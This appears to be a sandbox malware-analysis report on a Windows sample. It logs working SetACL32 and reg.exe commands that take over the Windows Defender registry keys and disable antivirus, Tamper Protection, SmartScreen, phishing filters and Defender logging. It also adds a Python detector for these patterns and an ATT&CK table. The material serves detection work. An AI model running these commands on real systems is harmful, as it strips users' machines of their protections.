Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn setowner -ownr "n:Administrators"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn ace -ace "n:Administrators;p:full"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t reg_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t reg_DWORD /d "4" /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn ace -ace "n:Administrators;p:full"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v "DisablePrivacyMode" /t reg_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t reg_DWORD /d "0" /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t reg_DWORD /d "0" /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontOfferThroughWUAU" /t reg_DWORD /d 1 /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t reg_DWORD /d 1 /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\RemovalTools\MpGears" /v "SpyNetReportingLocation" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "EnableSmartScreen" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn setowner -ownr "n:Administrators"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\SOFTWARE\Policies\Microsoft\Edge" /v "SmartScreenEnabled" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn setowner -ownr "n:Administrators"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t reg_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_EdgeSmartScreenOff" /t REG_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn ace -ace "n:Administrators;p:full"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AccountProtection_MicrosoftAccount_Disconnected" /t REG_DWORD /d 1 /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "RandomizeScheduleTaskTimes" /t reg_DWORD /d "0" /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "PUAProtection" /t reg_DWORD /d "0" /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t reg_DWORD /d 1 /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn setowner -ownr "n:Administrators"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn setowner -ownr "n:Administrators"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "EnableSmartScreen" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t reg_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v "DisablePrivacyMode" /t reg_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn setowner -ownr "n:Administrators"
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AccountProtection_MicrosoftAccount_Disconnected" /t REG_DWORD /d 1 /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "PUAProtection" /t reg_DWORD /d "0" /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t reg_DWORD /d "0" /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "RandomizeScheduleTaskTimes" /t reg_DWORD /d "0" /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn ace -ace "n:Administrators;p:full"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t reg_DWORD /d 1 /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn setowner -ownr "n:Administrators"
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v "DisablePrivacyMode" /t reg_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn setowner -ownr "n:Administrators"
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\SOFTWARE\Policies\Microsoft\Edge" /v "SmartScreenEnabled" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t reg_DWORD /d 1 /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn setowner -ownr "n:Administrators"
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "RandomizeScheduleTaskTimes" /t reg_DWORD /d "0" /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn setowner -ownr "n:Administrators"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\SOFTWARE\Policies\Microsoft\Edge" /v "SmartScreenEnabled" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t reg_DWORD /d 1 /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn ace -ace "n:Administrators;p:full"
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn ace -ace "n:Administrators;p:full"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
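The process creations above are the security-relevant part of this report. Every reg add that switches something off is preceded by a SetACL32 run that first takes ownership of the Windows Defender key (-actn setowner) and then grants Administrators full control (-actn ace "n:Administrators;p:full"); the keys are not writable by an elevated installer until that happens, which is why the ACL step comes first. Only then does reg.exe write DisableAntiVirus, TamperProtection, the Defender ETW autologger Start values, the SmartScreen and phishing-filter settings and the MRT reporting policies. The detector below runs that logic over process-creation command lines. It is an added example, not code from the report, from SetACL or from the sample. It assumes one command line per string (for instance the CommandLine field of a Sysmon event ID 1 record); the sample lines are constructed from the command lines listed above plus one benign control line; and the meaning of the data values in DISABLING_VALUES (TamperProtection 4 = off, autologger Start 0 = session not started) comes from public Defender documentation, not from this report.

```python
"""Flag Defender / SmartScreen tampering in process-creation command lines.

Added example; not code from the Joe Sandbox report, from SetACL or from the
analysed sample.  Input is assumed to be one command line per string (e.g.
the CommandLine field of Sysmon event ID 1).  The value semantics encoded in
DISABLING_VALUES are an assumption taken from public Defender documentation.
"""
import re
from dataclasses import dataclass
from typing import Dict, Iterable, List, Optional

# Key prefixes the report shows being taken over (SetACL) or written (reg add).
# Compared case-insensitively as prefixes of the key path in the command line.
PROTECTED_KEY_PREFIXES = (
    r"HKLM\SOFTWARE\Microsoft\Windows Defender",
    r"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender",
    r"HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\Defender",
    r"HKLM\SOFTWARE\Policies\Microsoft\MRT",
    r"HKLM\SOFTWARE\Microsoft\RemovalTools\MpGears",
    r"HKLM\SOFTWARE\Policies\Microsoft\Windows\System",
    r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost",
    r"HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost",
    r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer",
    r"HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter",
    r"HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter",
    r"HKCU\SOFTWARE\Policies\Microsoft\Edge",
    r"HKCU\Software\Microsoft\Windows Security Health\State",
)

# Value name -> data strings (lower-case) that switch a protection off.
# Assumption: TamperProtection 4 = off (5 = on); Autologger Start 0 = the
# Defender ETW session is not started; the rest are the documented "off" values.
DISABLING_VALUES: Dict[str, set] = {
    "disableantivirus": {"1"},
    "disableantispyware": {"1"},
    "tamperprotection": {"4"},
    "puaprotection": {"0"},
    "disableprivacymode": {"1"},
    "start": {"0"},
    "enablesmartscreen": {"0"},
    "smartscreenenabled": {"0", "off"},
    "enabledv9": {"0"},
    "enablewebcontentevaluation": {"0"},
    "dontofferthroughwuau": {"1"},
    "dontreportinfectioninformation": {"1"},
    "spynetreportinglocation": {"0"},
    "randomizescheduletasktimes": {"0"},
}


@dataclass(frozen=True)
class Finding:
    kind: str      # "acl_takeover" (SetACL setowner), "acl_grant" (SetACL ace) or "value_disable"
    key: str       # registry key the command targets
    detail: str    # the SetACL action or "Name=Data"
    cmdline: str


_SETACL_RE = re.compile(r'-on\s+"([^"]+)"\s+-ot\s+reg\s+-actn\s+(\w+)', re.I)
_REG_ADD_RE = re.compile(r'\breg(?:\.exe)?"?\s+add\s+"([^"]+)"(.*)$', re.I)
# /v NAME and /d DATA, quoted or bare; /t and /f are ignored.
_REG_OPT_RE = re.compile(r'/(v|d)\s+(?:"([^"]*)"|(\S+))', re.I)


def _norm_key(key: str) -> str:
    k = key.strip().strip('"').lower()
    return k.replace("hkey_local_machine", "hklm").replace("hkey_current_user", "hkcu")


def is_protected_key(key: str) -> bool:
    k = _norm_key(key)
    return any(k.startswith(p.lower()) for p in PROTECTED_KEY_PREFIXES)


def _reg_options(tail: str) -> Dict[str, str]:
    opts: Dict[str, str] = {}
    for m in _REG_OPT_RE.finditer(tail):
        opts[m.group(1).lower()] = m.group(2) if m.group(2) is not None else m.group(3)
    return opts


def analyze_cmdline(cmd: str) -> Optional[Finding]:
    """Return a Finding if the command line tampers with a protected key."""
    m = _SETACL_RE.search(cmd)
    if m and is_protected_key(m.group(1)):
        action = m.group(2).lower()
        kind = "acl_takeover" if action == "setowner" else "acl_grant"
        return Finding(kind, m.group(1), f"SetACL -actn {action}", cmd)
    m = _REG_ADD_RE.search(cmd)
    if m and is_protected_key(m.group(1)):
        opts = _reg_options(m.group(2))
        name, data = opts.get("v", ""), opts.get("d", "")
        if data.lower() in DISABLING_VALUES.get(name.lower(), set()):
            return Finding("value_disable", m.group(1), f"{name}={data}", cmd)
    return None


def analyze(cmdlines: Iterable[str]) -> List[Finding]:
    return [f for f in map(analyze_cmdline, cmdlines) if f is not None]


def summarize(findings: Iterable[Finding]) -> Dict[str, int]:
    counts: Dict[str, int] = {}
    for f in findings:
        counts[f.kind] = counts.get(f.kind, 0) + 1
    return counts


# Constructed sample: command lines copied from the report, plus one benign
# reg add (hypothetical key) as a control that must not fire.
SAMPLE_CMDLINES = [
    r'C:\Windows\system32\cmd.exe /c C:\Users\user~1\AppData\Local\Temp\nsq9535.tmp\do32.bat',
    r'SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn setowner -ownr "n:Administrators"',
    r'SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn ace -ace "n:Administrators;p:full"',
    r'reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t reg_DWORD /d "1" /f',
    r'reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t reg_DWORD /d "4" /f',
    r'reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t reg_DWORD /d "0" /f',
    r'reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f',
    r'reg add "HKCU\Software\Contoso\Example" /v "Theme" /t reg_SZ /d "dark" /f',
]

if __name__ == "__main__":
    for f in analyze(SAMPLE_CMDLINES):
        print(f"{f.kind:14} {f.key}  [{f.detail}]")
```

A single acl_takeover finding on a Defender key is a higher-fidelity signal than any one reg add, and the combination of both kinds under one parent cmd.exe (as in the do32.bat run above) should alert on its own. Note that Tamper Protection is designed to re-assert these settings, so a successful write does not by itself prove that protection is off; check the live state of the keys and of the Defender service as well.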
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe Code function: 3_2_00F80B70 SetSecurityDescriptorOwner,GetLastError,SetSecurityDescriptorGroup,GetLastError,SetSecurityDescriptorDacl,GetLastError,SetSecurityDescriptorSacl,GetLastError,MakeSelfRelativeSD,MakeSelfRelativeSD,MakeSelfRelativeSD,GetLastError,3_2_00F80B70
Source: PowerRun.exe.0.drBinary or memory string: @3PDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
Source: PowerRun64.exe.0.drBinary or memory string: ASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation (2 identical entries)
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,3_2_00F99760
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,3_2_00F9A0C1
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe Code function: EnumSystemLocalesW,3_2_00F9A2C3
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe Code function: GetLocaleInfoW,3_2_00F9A806
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe Code function: EnumSystemLocalesW,3_2_00F99AE8
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe Code function: EnumSystemLocalesW,3_2_00F99A4D
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe Code function: EnumSystemLocalesW,3_2_00F99A02
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,3_2_00F99B73
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe Code function: GetLocaleInfoW,3_2_00F99DC6
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,3_2_00F99EEC
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe Code function: GetLocaleInfoW,3_2_00F99FF2
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe Code function: 3_2_00F8BC85 cpuid 3_2_00F8BC85
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe Code function: 3_2_00F698F0 EnterCriticalSection,GetSystemTimeAsFileTime,GetCurrentThreadId,GetUserNameExW,GetLastError,GetUserNameExW,GetLastError,LeaveCriticalSection,LeaveCriticalSection,3_2_00F698F0
Source: C:\Users\user\Desktop\Ptmhbplhxb.exe Code function: 0_2_004031F1 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004031F1
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe Code function: 3_2_00F88D30 LookupAccountNameW,GetLastError,GetLastError,GetLastError,LookupAccountNameW,GetLastError,IsValidSid,IsValidSid,GetLengthSid,CopySid,Concurrency::cancel_current_task,3_2_00F88D30
MITRE ATT&CK Matrix (digits in front of a technique name are the report's hit-count badges; techniques without digits were not observed):

| Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Valid Accounts | 1 2 Command and Scripting Interpreter | Path Interception | 1 Access Token Manipulation | 1 Modify Registry | OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | Exfiltration Over Other Network Medium | 1 Encrypted Channel | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | 1 System Shutdown/Reboot |
| Default Accounts | 1 Scripting | Boot or Logon Initialization Scripts | 1 2 Process Injection | 1 Virtualization/Sandbox Evasion | LSASS Memory | 1 2 1 Security Software Discovery | Remote Desktop Protocol | 1 Clipboard Data | Exfiltration Over Bluetooth | Junk Data | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
